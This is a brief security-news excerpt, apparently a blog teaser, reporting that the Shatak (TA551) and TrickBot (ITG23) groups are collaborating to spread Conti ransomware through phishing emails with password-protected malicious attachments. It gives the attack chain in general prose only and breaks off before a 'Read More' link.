TrickBot and Shatak: the New Partnership in the Conti Ransomware Saga

It seems that Conti ransomware attacks are taken to another level. Two threat actor groups have started to collaborate, joining efforts for Conti ransomware deployment on targeted systems purposes. The first gang refers to the one dubbed Shatak or TA551 who has started cooperating with another threat actor group named ITG23, also known as Wizard Spider or TrickBot.

How Does This Partnership Between Threat Actors Unfold?

As per an IBM X-Force’s discovery, the two gangs started their collaboration during the month of July this year.

As BleepingComputer describes, the usual attack carried out through this partnership by the two gangs unfolds like this:

Shatak is the one responsible to deliver a phishing email. Inside that malicious email, a compromised file can be found within an archive that can be accessed via a password. Common methods of Shatak attacks include stolen reply-chain emails supplemented by these kinds of attachments that are password protected. Inside the malicious attachments lie compromise scripts. What these scripts do is to perform code execution, code that is base-64 encoded and that will eventually result in the downloading from a remote website and the deployment of the TrickBot malware or the malware dubbed BazarBackdoor. After one

Read More: https://heimdalsecurity.com/blog/trickbot-and-shatak-the-new-partnership-to-deliver-conti-ransomware/